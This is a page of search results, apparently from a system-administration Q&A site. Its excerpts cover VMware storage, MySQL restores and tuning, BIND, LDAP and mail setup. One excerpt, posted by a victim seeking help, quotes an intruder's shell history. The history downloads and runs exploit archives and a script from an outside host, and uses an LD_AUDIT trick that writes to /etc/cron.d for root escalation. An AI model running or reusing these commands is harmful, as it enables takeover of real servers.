Search Results

Search found 10384 results on 416 pages for 'plan cache'.

Page 323/416 | < Previous Page | 319 320 321 322 323 324 325 326 327 328 329 330  | Next Page >

  • VMware NAS/iSCSI recommendations - smallish organization

    - by Bubnoff
    I have two VMware servers - ESX + ESXi. Two backup NAS boxes. The current NAS boxes are low-cost and unsuitable for running VMs from. Support NFS only. Slow. My plan is to have a dedicated iSCSI/NAS for storing and running VMs. Two additional low-cost boxes for backup. I'm looking for advice regarding 2 things really: Recommendations as far as VMware architecture/design for a smaller organization. Less than 20 Virtual Machines. 2 servers + 2 x 1.5 terabyte backup NAS boxes. A good NAS/iSCSI box with your recommendation on RAID config ...I would go with 6 or better. I'm trying to design an installation that is both fast and reliable/redundant. If you have any experiences to share or your current configuration including network design ( switches, fiber ...etc ), I will be enormously thankful. I'm not married to this idea, so if you have a design not using iSCSI NAS boxes ...let er rip. Cost? Can we stay around $5,000 ( on top of already stated components )? Links to info are welcome also. Thanks for reading! Bubnoff

    Read the article

  • Copy files from sub directories into one directory.

    - by Derek Organ
    Ok I have a bunch of files in this file structure format. /backup/daily/database1/database1-2011-01-01.sql /backup/daily/database1/database1-2011-01-02.sql /backup/daily/database1/database1-2011-01-03.sql /backup/daily/database1/database1-2011-01-04.sql /backup/daily/database1/database1-2011-01-05.sql /backup/daily/database1/database1-2011-01-06.sql /backup/daily/database1/database1-2011-01-07.sql /backup/daily/anotherdb/anotherdb-2011-01-01.sql /backup/daily/anotherdb/anotherdb-2011-01-02.sql /backup/daily/anotherdb/anotherdb-2011-01-03.sql /backup/daily/anotherdb/anotherdb-2011-01-04.sql /backup/daily/anotherdb/anotherdb-2011-01-05.sql /backup/daily/anotherdb/anotherdb-2011-01-06.sql /backup/daily/anotherdb/anotherdb-2011-01-07.sql /backup/daily/stuff/stuff-2011-01-01.sql /backup/daily/stuff/stuff-2011-01-02.sql /backup/daily/stuff/stuff-2011-01-03.sql /backup/daily/stuff/stuff-2011-01-04.sql /backup/daily/stuff/stuff-2011-01-05.sql /backup/daily/stuff/stuff-2011-01-06.sql /backup/daily/stuff/stuff-2011-01-07.sql And there are lots lots more. ultimately I want to import all the 2011-01-07.sql files into my mysql database. This works for one mysql -u root -ppassword < /backup/daily/database1/database1-2011-01-07.sql That will nicely restore that database from this backupfile. I want to run a process where it does this for all databases. So my plan is to first cp all 2011-01-07 sql files into a tmp dir e.g. cp /backup/daily/*/*2011-01-07*.sql /tmp/all The command above unfortunately isn't working I get an error: cp: cannot stat ..... No such file or directory So can you guys help me out with this. For bonus points if you can tell me how to do the next step which is import all databases in one command doing one at a time that would be great too. I really want to do these in two separate steps because I need to delete a few sql files manually from the tmp dir before I run the restore command. So I need: 1) command to copy all 2011-01-07 sql files to a tmp dir 2) command to import all those files in that dir into mysql I know its possible to do in one but for lots of reasons I really would prefer to do it in two steps.

    Read the article

  • MySQL is killing the server IO.

    - by OneOfOne
    I manage a fairly large/busy vBulletin forums (running on gigenet cloud), the database is ~ 10 GB (~9 milion posts, ~60 queries per second), lately MySQL have been grinding the disk like there's no tomorrow according to iotop and slowing the site. The last idea I can think of is using replication, but I'm not sure how much that would help and worried about database sync. I'm out of ideas, any tips on how to improve the situation would be highly appreciated. Specs : Debian Lenny 64bit ~12Ghz (6 cores) CPU, 7520gb RAM, 160gb disk. Kernel : 2.6.32-4-amd64 mysqld Ver 5.1.54-0.dotdeb.0 for debian-linux-gnu on x86_64 ((Debian)) Other software: vBulletin 3.8.4 memcached 1.2.2 PHP 5.3.5-0.dotdeb.0 (fpm-fcgi) (built: Jan 7 2011 00:07:27) lighttpd/1.4.28 (ssl) - a light and fast webserver PHP and vBulletin are configured to use memcached. MySQL Settings : [mysqld] key_buffer = 128M max_allowed_packet = 16M thread_cache_size = 8 myisam-recover = BACKUP max_connections = 1024 query_cache_limit = 2M query_cache_size = 128M expire_logs_days = 10 max_binlog_size = 100M key_buffer_size = 128M join_buffer_size = 8M tmp_table_size = 16M max_heap_table_size = 16M table_cache = 96 Other : > vmstat procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu---- r b swpd free buff cache si so bi bo in cs us sy id wa 9 0 73140 36336 8968 1859160 0 0 42 15 3 2 6 1 89 5 > /etc/init.d/mysql status Threads: 49 Questions: 252139 Slow queries: 164 Opens: 53573 Flush tables: 1 Open tables: 337 Queries per second avg: 61.302. Edit Additional info.

    Read the article

  • Software/hardware to build video streaming server?

    - by Sasha Yanovets
    I am looking for a video streaming server solution, something like online TV server, with ability to make live broadcasts in the internet. What software could you recommend for that? What kind of hardware it should run on, should be there anything special? I am looking for a solution that could be scaled up to at least 1000 simultaneous users online with good resolution of video. I think it is good to have general answer on what direction to choose. But here more details on my specific case: I just looking for a solution almost from scratch. We have some video content that we've produced, but it is not delivered over internet yet. We do not tied to any particular vendor for now. We want to make 24 hours of steaming three 8 hour blocks with change of content every day. We want the ability to make regular live broadcasts. I guess we will need to have several options of streaming quality (low ~56 kb/s mid ~273 kb/s). Some terms just foreign to me (like play-truncation rate), if you could point out what parameters we should avare of, it would be great. Uplink to the internet is to be determined. We plan to start from something and scale up on the way. If you are already have some kind of media streaming server, just describe its configuration here (hardware, OS, software), peak number of concurrent users it serves. I think it could help people approaching this task.

    Read the article

  • Apache in OS X not displaying localhost nor vhosts correctly

    - by Marcus
    I've encountered a really odd problem in my development environment, and I really can't make any sense of it. It started by a locally developed PHP-site refused to update any content I edited in a file – no text or nothing. So if the document was: <h2>Hello!</h2> and I edited it to <h2>What's wrong?!</h2> it still outputed <h2>Hello!</h2>. I thought is was some kind of cache:ing problem, but no "hard reloads" in the browser nor sudo apachectl -k restart sorted it out. Only a restart of my Mac did finally fix it. Now, a few days later even stranger issues are appearing. I have a LAMP-stack installed via Homebrew, in httpd-vhosts.conf I've set ~/Dev/ as my localhost, and I set up a <VirtualHost *80> for each project ("ServerName projectname.dev" for example). However, what ever files of folder I put in ~/Dev/ have stopped showing up on localhost, and new VirtualHost-directives doesn't work. Three projects + "docs" in the folder: But "localhost" only displays the two older projects...? So, as I've said – I've tried restarting Apache (without errors), clearing browser caches (tried in three browsers, Chrome, Safari and Firefox) and ever rebooting the Mac. Nothing. Any ideas? Running OS X 10.8.5 and Apache 2.2.24.

    Read the article

  • Moving my OpenID from Livejournal to... something else.

    - by T-Boy
    I've actually been an early user of OpenID, although there are still some questions that I've had with OpenID that I've never really had satisfactorily answered. Now, I understand that if I have full control over my domain, I can set it up so that I can delegate the task of authenticating to another OpenID service provider. The problem is, what I'd like to do is to get the Livejournal server to pass the authentication to someone else, instead of having LJ doing it. Preferably what I'd like to do is get Livejournal, when asked by a authenticating provider, say, "No, I don't do it anymore -- go to this address". The plan was that this address would then be in a domain I fully control, which then would pass it on to whichever service provider I choose. I don't even know if I've gotten my understanding of OpenID right, if all this shenanigans are necessary, if my question makes sense, or if it's even possible with a service provider like Livejournal. (tried tagging this with livejournal, and it told me I couldn't, because I don't have enough reputation. Oh well; one must start somewhere. Sorry for the inconvenience!)

    Read the article

  • VMWare Setup with 2 Servers and a DAS (DELL MD3220)

    - by Kumala
    I am planning to use a VMWare based setup consisting of two VMWare servers (2 CPU, 256GB Memory) and a DAS (DELL MD3220 with 24x900GB disks). The virtual machines will be half running MS SQL databases (Application, Sharepoint, BI) and the other half of the VM will be file services, IIS. To enhance the capacity of the storage, we'll be adding a MD1220 enclosure with another 24x900GB to the MD3220. Both DAS will have 2 controllers. Our current measured IOPS is 1000 IOPS average, 7000 IOPS peak (those happen maybe twice per hour). We are in the planning phase now and are looking at the proper setup of the disks. The intention is to setup up both DAS one of the DAS with RAID 10 only and the other DAS with RAID 5. That will allow us to put the applications on the DAS that supports the application performance needs best. Question is how best to partition the two DASs to get best possible IOPS/MBps, each DAS will have to have 2 hot spares? For the RAID 5 Setup: Generally speaking, would it be better to have one single disk group across all 22 disks (24 - 2 hot spares) with both controllers assigned to the one disk group or is it better to have 2 disk groups each 11 disks, assigned to one of the two controllers? Same question for the RAID 10 setup: The plan is: 2 disks for logs (Raid 1), 2 Hotspare and 20 disks for RAID 10. Option 1: 5 * 4 disks (RAID 10), with two groups assigned to 1 controller and 3 groups to the other controller Option 2: One large RAID 10 across all the disks and have both controllers assigned to the same group? I would assume that there is no right or wrong, but it all depends very much on the specific application behaviour, so I am looking for some general ideas what the pros and cons are of the different options. IF there are other meaningful options, feel free to propose them.

    Read the article

  • Problems forwarding zone to another DNS server.

    - by sebastian nielsen
    I have a authorative DNS server at 83.248.21.18 which are authorative for the domain "finahemgoteborg.se". Now my registrar is requiring me to have 2 DNS servers for the domain, so I would now want the machine 85.228.103.141 just forward all incoming queries for "finahemgoteborg.se" to the 83.248.21.18 server. In the 85.228.103.141 BIND server, I have the following config: zone "finahemgoteborg.se" in { type forward; forwarders {83.248.21.18;}; }; But the problem is that 85.228.103.141 is still responding with "REFUSED" when querying it for example www.finahemgoteborg.se A record. How can I fix it. I do NOT want to set up a master/slave situation, just one nameserver that forwards to a another. Edit The Rest of named.conf: options { directory "/var/cache/bind"; version "none"; allow-recursion {"none";}; minimal-responses no; }; zone "sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "ns1sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "ns2sebn.us.to" in{ type master; file "/etc/bind/sebn.us.to"; }; zone "finahemgoteborg.se" in{ type forward; forwarders {83.248.21.18;}; };

    Read the article

  • getent passwd fails, getent group works?

    - by slugman
    I've almost got my AD integration working completely on my OpenSUSE 12.1 server. I have a OpenSUSE 11.4 system successfully integrated into our AD environment. (Meaning, we use ldap to authenticate to AD directory via kerberos, so we can login to our *nix systems via AD users, using name service caching daemon to cache our passwords and groups). Also, important to note these systems are in our lan, ssl authentication is disabled. I am almost all the way there. Nss_ldap is finally authenticating with ldap server (as /var/log/messages shows), but right now, I have another problem: getent passwd & getent shadow fails (shows local accounts only), but getent group works! Getent group shows all my ad groups! I copied over the relavent configuration files from my working OpenSUSE 11.4 box: /etc/krb5.conf /etc/nsswitch.conf /etc/nscd.conf /etc/samba/smb.conf /etc/sssd/sssd.conf /etc/pam.d/common-session-pc /etc/pam.d/common-account-pc /etc/pam.d/common-auth-pc /etc/pam.d/common-password-pc I didn't modify anything between the two. I really don't think I need to modify anything, because getent passwd, getent shadow, and getent group all works fine on the OpenSUSE11.4 box. Attempting to restart nscd service unfortunately didn't do much, and niether did running /usr/sbin/nscd -i passwd. Do any of you admin-gurus have any suggestions? Honestly, I'm happy I made it this far. I'm almost there guys!

    Read the article

  • I cannot access Windows Update at all

    - by Cardinal fang
    I have been unable to access the Windows update site for a couple of weeks now. I just get a message saying "Internet Explorer cannot display the webpage" and saying I have connection problems. Same thing is replicated with any other Microsoft site I try to access. The Automatic Updates also do not work. I can access every other wesbite I've surfed to. I've tried Googling the problem and based on what other site have suggested I have cleared my cache and temp files. I've scanning my hard drive with my antivirus in case I have a virus (nada). I've tried turning off my firewall and anti-virus (I run Zone Alarm). I've downloaded SpyBot and scanned my drive with that in case something was missed by Zone Alarm (again nada). Based on suggestions from the smart cookies on the Bad Science forum, I've used nslookup to check my translation isn't wonky (got all the info they said I should get). I've also tried navigating there directly using the IP address I was given (nope). I normally access the internet through a 3 mobile broadband connection, but have also tried connecting using a mate's wi-fi connection in case it was something on my mobile modem interferring. I run Windows XP SP3 with Internet Explorer 7 and Zone Alarm Internet Security Suite as my anti-virus/ firewall. Any suggestions?

    Read the article

  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • What are problems and pitfalls with a public facing Active Directory

    - by Ralph Shillington
    The situation that i'm faced with is this: We plan on using a number of server applications hosted on Amazon EC2 machines, mainly Microsoft Team Foundation Server. These services rely heavily on Active Directory. Since our servers are in the Amazon cloud it should go without saying (but I will) that all our users are remote. It seems that we can't setup VPN on our EC2 instance -- so the users will have to join the domain, directly over the internet then they'll be able to authenticate and once authenticated, use that token for accessing resources such as TFS. on the DC instance, I can shut down all ports, except those needed for joining/authenicating to the domain. I can also filter the IP on that machine to just those address that we are expecting our users to be at (it's a small group) On the web based application servers, I imagine all we need to open is port 80 (or 8080 in the case of TFS) One of the problems that I'm faced with is what domain name to use for this Active directory. Should I go with "ourDomainName.com" or "OurDomainName.local" If I choose the latter, does that not mean that I'll have to get all our users to change their DNS address to point to our server, so it can resolve the domain name (I guess I could also distribute a host file) Perhaps there is another alternative that I'm completely missing.

    Read the article

  • Why do you use a 3PAR SAN? [closed]

    - by Starfish
    If you use a 3PAR SAN, I’d like to hear what you think about it, particularly compared to the HP EVA. What do you see as its advantages over other SANs like the EVA? What’s so special about the ASIC? We had HP quote us an EVA P6500 and 3PAR V400 with equivalent storage and the 3PAR was nearly twice the cost. My site has two EVA SANs with a combined capacity of ~80 TB. We want to replace the older and larger of the two. We’ve been looking at the EVA and the 3PAR to see which would be a better fit for us. I’m struggling to understand how the 3PAR differs from the EVA from a practical technical standpoint. When I read the sales literature and speak with the HP sales engineers, they spend a lot of time talking about how the 3PAR is better because of its ASIC. It’s ASIC this and ASIC that, but when I press them on how a 3PAR with thin provisioning is better than an EVA with thin provisioning, I can’t get a straight answer. Meanwhile, one of my colleagues, who has more say regarding which SAN we get, is enamored by the 3PAR, and he can’t explain clearly to me why he wants it over the EVA. Our needs are pretty simple. We have 10 servers running VMware and ~100 VMs. We use VMware’s thin provisioning currently, but we would like to start using thin provisioning on the new SAN. We don’t have a need for SSDs or migration between storage tiers. We plan on having FC or SAS drives for our most used data and SATA/FATA drives for the lesser used data which is how we have the EVAs configured. We also do not need any SAN-level snapshotting or replication.

    Read the article

  • How to make project auto-estimate duration based on work?

    - by Bruno Brant
    This one has bothered me for a long while. I like to do estimates thinking on how much time a certain task will take (I'm in TI business), so, let's say, it takes 12 hours to build a program. Now, let's say I tell Project that my beginning date is today. If I allocate one resource to this task, it means that the task will last 1,5 days, implying that it will end tomorrow. But right now, that is not what it's doing. I say that the task will take 1 hour, and when I add a resource to it, it allocate the resource at [13%] basis, which means that the duration is still fixed... project is trying to make the task last for a day. I have, on many occasions, accomplished this. What I do is build a plan based on these rough estimates for effort, then I allocate tasks to resources. Times conflict, so I level resources and then Project magically tells me how long, in days, will it take. But every time I have to start estimating again, I end up having trouble on how to make project work like that.

    Read the article

  • Replacing DropBox with: Amazon S3 + SSL + GPG/TrueCrypt + Mounting on OSX ??

    - by Matt Rogish
    So, right now we're using DropBox to share various data files around between approximately 10 Mac OS X systems. However, we already have an S3 account and everyone on the lowest DropBox plan of $10/mo seems too expensive. So, I am contemplating something that would allow us to replace DropBox with our own home-grown solution. We are all fairly technical people and/or smart enough to follow some steps, so if it's not as "user friendly" as DropBox we're all comfortable with that. There are plenty of docs out there that have bits and pieces of what I want but some of the tools don't seem to fit the requirements: Transport security via SSL to the bucket Encryption of bucket contents Bi-directional syncing Most of the scripts I can find on the internet use "duplicity" which appears to fail #1 (it doesn't look like duplicity supports SSL to S3 - the docs don't state but the protocol looks plain old http http://www.nongnu.org/duplicity/duplicity.1.html#sect6 ) Many scripts use gpg to encrypt files. This seems like it could work, however I have to make sure that each OSX client is able to use the same key to encrypt and decrypt files (key management is left to me to manage). Finally, most of the scripts use one-way replication, e.g. using Amazon S3 as a simple backup store. As we'd be using Amazon S3 as the "repository" they fail this one. Whew. So, I'd love a single tool that does this but after an exhaustive search I don't think one exists. I'd be happy just knowing which tools out there can fulfill my 3 requirements, after that I can stitch together the rest. Any thoughts? THANKS!

    Read the article

  • sendmail on Snow Leopard

    - by Jay
    I'm trying to get sendmail working on my MacBook Pro (OS 10.6.4), so that I can send mail with PHP's mail() function. If you know how to do this without sendmail, I'd be interested in that also. The plan is to send mail through smtp.gmail.com using my gmail account, unless you have a better idea. I did this and that didn't work. In /etc/postfix/smtp_sasl_passwords I tried both:     smtp.yourisp.com username:password and     smtp.yourisp.com [email protected]:password The problem seems to be that google doesn't like me. I don't think my ISP is blocking it because Mail.app can send email through smtp.gmail.com just fine. $email is my gmail address. $ printf "Subject: TestMail" | sendmail -f $email $email $ tail /var/log/mail.log Oct 21 19:38:18 Jays-MacBook-Pro postfix/master[8741]: daemon started -- version 2.5.5, configuration /etc/postfix Oct 21 19:38:18 Jays-MacBook-Pro postfix/qmgr[8743]: CAACBFA905: from=<$email>, size=377, nrcpt=1 (queue active) Oct 21 19:38:18 Jays-MacBook-Pro postfix/pickup[8742]: C2A68FA93A: uid=501 from=<$email> Oct 21 19:38:18 Jays-MacBook-Pro postfix/cleanup[8744]: C2A68FA93A: message-id=<20101021233818.$mydomain> Oct 21 19:38:18 Jays-MacBook-Pro postfix/qmgr[8743]: C2A68FA93A: from=<$email>, size=377, nrcpt=1 (queue active) Oct 21 19:38:18 Jays-MacBook-Pro postfix/smtp[8746]: initializing the client-side TLS engine Oct 21 19:38:18 Jays-MacBook-Pro postfix/smtp[8748]: initializing the client-side TLS engine Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8746]: connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8748]: connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8746]: CAACBFA905: to=<$email>, relay=none, delay=1334, delays=1304/0.04/30/0, dsn=4.4.1, status=deferred (connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out) Oct 21 19:38:49 Jays-MacBook-Pro postfix/smtp[8748]: C2A68FA93A: to=<$email>, relay=none, delay=30, delays=0.08/0.05/30/0, dsn=4.4.1, status=deferred (connect to smtp.gmail.com[74.125.157.109]:25: Operation timed out) $ I also tried setting myhostname, mydomain, and myorigin in /etc/postfix/main.cf to $ nslookup myip (as displayed by http://www.whatismyip.com/) And still no luck. Any ideas?

    Read the article

  • Unable to record using Jmeter

    - by krish
    Hi, I am trying to record a http web page using Jmeter 2.3.3 version.I has setup the JMeter proxy and tried, but did n't work. I have followed the below steps. Launch jmeter 2.3.3, added thred group to test plan Under Workbench-add-non-test elements- added HTTP proxy server. proxy server setting are port:9090, target:use recording controller, grouping:donot group samplers, Type:HTTp request and checked the boxes of all under http sampler settings Saved the settings Now in browser(IE 7.0 or firefox 3.0.16), under connection settings, setup the manual proxy settings as local host and port as 9090(no auto detect settings nothing, only manual proxy). Setting saved Now in the jmeter, started the http proxy server. Open a browser and hit the webpage needs to be tested. The page is not opened. In fact because of the changes made in browsers, no pages are opened. Whenever i try hitting a page, the pages are recorded in the Jmeter. but without the page open, how can i test. I looking for an immediate answer and my work is blocked. Immediate answer would be appreciated.

    Read the article

  • Need advise for choosing software\hardware for virtualization.

    - by Anatoly
    Currently we have these servers : Windows SBS 2003 premium on IBM X266 double Xeon F43, 2GB ram. DC, exchange (70 users), Mssql. Windows 2003 R2 32bit on IBM x3400 with double XEON E5310 and 4GB ram. Terminal server (40+ users), ERP application based on uniPaaS platform from Magicsoftware, and Pervasive sql. Ubuntu 8.04 (simple pc box) with squid proxy, GLPI system and PHPBB3 forum for internal use. Recently number of concurrent users on Terminal server passed 40 users in rush hours and it gets stuck frequently. Therefore we need an upgrade. I think about transfer all physical servers to virtual servers based on cluster of 2 physical servers for reducing downtime. I think we will grow till 50-60 concurrent terminal users in rush hours. I also plan to virtualize 10-15 Win XP/7 workstation (office,ERP etc), and there is a little probability for Asterisk\Hylafax for 100 users (if it possible on same VM). Also we need NAS storage for 2-3TB. What hardware upgrade/purchase we need for complete this task? Which VM solution is preferable VmWare or Hyper-V? What backup software should we choose? Acronis or something another? Thank you in advance.

    Read the article

  • setting up git on cygwin - openssl

    - by Pete Field
    I'm trying to get git running in cygwin on a windows 7 machine I have git unpacked and the directory git-1.7.1.1 when i run make install from within that directory, I get CC fast-import.o In file included from builtin.h:4, from fast-import.c:147: git-compat-util.h:136:19: iconv.h: No such file or directory git-compat-util.h:140:25: openssl/ssl.h: No such file or directory git-compat-util.h:141:25: openssl/err.h: No such file or directory In file included from builtin.h:6, from fast-import.c:147: cache.h:9:21: openssl/sha.h: No such file or directory In file included from fast-import.c:156: csum-file.h:10: error: parse error before "SHA_CTX" csum-file.h:10: warning: no semicolon at end of struct or union csum-file.h:15: error: 'crc32' redeclared as different kind of symbol /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here csum-file.h:15: error: 'crc32' redeclared as different kind of symbol /usr/include/zlib.h:1285: error: previous declaration of 'crc32' was here csum-file.h:17: error: parse error before '}' token fast-import.c: In function `store_object': fast-import.c:995: error: `SHA_CTX' undeclared (first use in this function) fast-import.c:995: error: (Each undeclared identifier is reported only once fast-import.c:995: error: for each function it appears in.) fast-import.c:995: error: parse error before "c" fast-import.c:1000: warning: implicit declaration of function `SHA1_Init' fast-import.c:1000: error: `c' undeclared (first use in this function) fast-import.c:1001: warning: implicit declaration of function `SHA1_Update' fast-import.c:1003: warning: implicit declaration of function `SHA1_Final' fast-import.c: At top level: fast-import.c:1118: error: parse error before "SHA_CTX" fast-import.c: In function `truncate_pack': fast-import.c:1120: error: `to' undeclared (first use in this function) fast-import.c:1126: error: dereferencing pointer to incomplete type fast-import.c:1127: error: dereferencing pointer to incomplete type fast-import.c:1128: error: dereferencing pointer to incomplete type fast-import.c:1128: error: `ctx' undeclared (first use in this function) fast-import.c: In function `stream_blob': fast-import.c:1140: error: `SHA_CTX' undeclared (first use in this function) fast-import.c:1140: error: parse error before "c" fast-import.c:1154: error: `pack_file_ctx' undeclared (first use in this functio n) fast-import.c:1154: error: dereferencing pointer to incomplete type fast-import.c:1160: error: `c' undeclared (first use in this function) make: *** [fast-import.o] Error 1 I'm guessing that most of these errors are due to the iconv.h and openssl files which apparently are missing, but I can't figure out how I'm supposed to install those (if I am), or if there is some other way to get around this.

    Read the article

  • Best practices for thin-provisioning Linux servers (on VMware)

    - by nbr
    I have a setup of about 20 Linux machines, each with about 30-150 gigabytes of customer data. Probably the size of data will grow significantly faster on some machines than others. These are virtual machines on a VMware vSphere cluster. The disk images are stored on a SAN system. I'm trying to find a solution that would use disk space sparingly, while still allowing for easy growing of individual machines. In theory, I would just create big disks for each machine and use thin provisioning. Each disk would grow as needed. However, it seems that a 500 GB ext3 filesystem with only 50 GB of data and quite a low number of writes still easily grows the disk image to eg. 250 GB over time. Or maybe I'm doing something wrong here? (I was surprised how little I found on the subject with Google. BTW, there's even no thin-provisioning tag on serverfault.com.) Currently I'm planning to create big, thin-provisioned disks - but with a small LVM volume on them. For example: a 100 GB volume on a 500 GB disk. That way I could more easily grow the LVM volume and the filesystem size as needed, even online. Now for the actual question: Are there better ways to do this? (that is, to grow data size as needed without downtime.) Possible solutions include: Using a thin-provisioning friendly filesystem that tries to occupy the same spots over and over again, thus not growing the image size. Finding an easy method of reclaiming free space on the partition (re-thinning?) Something else? A bonus question: If I go with my current plan, would you recommend creating partitions on the disks (pvcreate /dev/sdX1 vs pvcreate /dev/sdX)? I think it's against conventions to use raw disks without partitions, but it would make it a bit easier to grow the disks, if that is ever needed. This is all just a matter of taste, right?

    Read the article

  • Production deployment to EC2 with minimal downtime

    - by jensendarren
    I have a simple web application deployed on a large instance with EC2. I now want to deploy the latest code to this server but I want to do this in a way which minimizes downtime and is a smooth as possible for the end user. Here is my plan: Fire up another large instance Install all the software layers on that instance Restore and attach an EBS drive to the instance Deploy our latest production ready code on the new instance Run all tests (including manual testing of the application) (If tests pass) Put a "Site Under Maintenance" notice on the live site. Backup the EBS instance on the live site Detach the EBS instance from the new server and replace with the latest backup Use ec2-associate-address to move the IP address to the new instance Sit back and wait for traffic to start flowing though the new instance Terminate the old instance Does this seem like a good strategy? Are there any tutorials or books that might cover this topic? I have already read Cloud Application Architectures by George Reese, which is an excellent book, but does not cover deployment. Additionally, I know that there are tools that can help with this like RightScale or enStratus which I will use when I start using more than one instance.

    Read the article

  • Laptop Most Likely to Have Good Driver Support

    - by ShabbyDoo
    Through numerous bad experiences, I have learned that the most likely cause of laptop "failure" is the lack of updated drivers for new operating systems. As an example, I have a perfectly good Thinkpad T42 at home which runs Windows 7 just fine for my purposes except that no compatible ATI video drivers are available, and the generic drivers have flicker effects. I recently saw an ASUS laptop which looked quite nice except that I would be beholden to them to release ATI video driver updates customized for it. And, I can't trust them to do that for more than six months. What laptops (manufacturer/line) should I consider so that I could expect at least a couple years of frequent updates? I plan on running Windows 7 and installing whatever successor comes out. I like Intel components (especially WiFi) because I can install their drivers directly from them, and they have a long history of providing updates for years after shipping a particular component. More generally, components from companies which are likely to update drivers frequently are good as long as I can install the component manufacturer-provided drivers without laptop-specific customization (like the ATI drivers). Also, if a component can be replaced easily, I am less concerned. For example, Dell stopped pumping out updated drivers for one of its mini-PCI WiFi cards. The solution was to buy an Intel replacement on eBay for $12! That's fine. I can deal with that. So, what laptops should I consider so that I'm not likely to be stuck between a rock and a hard place?

    Read the article

  • LYNC 2010 Dial-In in Meeting DTMF issue

    - by user140116
    We are facing an issue in the LYNC2010 dial-in to a meeting. We redirect an Asterisk number to LYNC, whitch connects successfully in the dial-in plan of LYNC. After calling from external network to the given number, we hear LYNC aswering and prompting us to enter the PIN and afterwards the hash key. I should mention that all other dials to LYNC from Asterisk and vise versa are routed successfully. Also all DTMF we send to Asterisk from the phone (IVR, Extension, PIN etc) are routed also fine Afterwards we press the appropriate pin folowed by the hash keyand we get 'Sorry I can't find meeting with that number' Some pros mentioned that it might be dtmfmode=RFC2833 or dtmfmode=auto in Asterisk (All checked and tried). Some pros mentioned, that there is a problem in geeral in LYNC and DTMF (even with Cisco Call Manager). Some other pros mentioned that chack box 'Enable refer support' in Voice Routinh\Trunk Configuration' in LYNC has to be unchecked (Also tested). The problem stil remains and there is no way to enter a meeting room by dial-in. ANY idea would be appreciated!!!!!!!!

    Read the article

  • COMPAQ Tower No Signal to monitor

    - by Lancelot
    I received a Compaq tower: Compaq Presario SR1224NX Onboard VGA Windows XP SP2 from a friend. My plan was to turn this into an Ubuntu Server. It booted up with no problems even with the Ubuntu live disc. After a normal shutdown (not unplugging the power cord and not doing a hard shutdown with the power button), it would not restart even after SEVERAL attempts. I realized the light next to the power supply would flash very rapidly. I researched and found out it was one of two things: a dead power supply or the cables to the motherboard and to the disks might be faulty, etc. Thus, I checked to ensure the cables were fine(and they were). I purchased a Power Supply (this one has 400 watts, the initial had 250) and installed it. The tower was able to boot into the live disk and everything. After a normal shutdown, it now restarts but is not sending signal to my monitor. I have tried several monitors in which I know work perfectly but not with this tower (I recall that it did show display after replacing the power supply). The monitors are ACER. This is different than most "no Signal" problems since I am not using an external Video Card, this is onboard VGA.

    Read the article

  • setup lowcost image storage server with 24x SSD array to get high IOPS?

    - by Nenad
    I want to build let's name it a lowcost Ra*san which would host for our social site the images (many millions) we have 5 sizes of every photo with 3 KB, 7 KB, 15 KB, 25 KB and 80 KB per Image. My idea is to build a Server with 24x consumer 240 GB SSD's in Raid 6 which will give me some 5 TB Disk space for the photo storage. To have HA I can add a 2nd one and use drdb. I'm looking to get above 150'000 IOPS (4K Random reads). As we mostly have read access only and rarely delete photos i think to go with consumer MLC SSD. I read many endurance reviews and don't see there a problem as long we don't rewrite the cells. What you think about my idea? - I'm not sure between Raid 6 or Raid 10 (more IOPS, cost SSD). - Is ext4 OK for the filesystem - Would you use 1 or 2 Raid controller, with Extender Backplane If anyone has realized something similar i would be happy to get Real World numbers. UPDATE I have buy 12 (plus some spare) OCZ Talos 480GB SAS SSD Drive's they will be placed in a 12-bay DAS and attached to a PERC H800 (1GB NV Cache, manufactured by LSI with fastpath) Controller, I plan to setup Raid 50 with ext4. If someone is wondering about some benchmarks let me know what you would like to see.

    Read the article

< Previous Page | 319 320 321 322 323 324 325 326 327 328 329 330  | Next Page >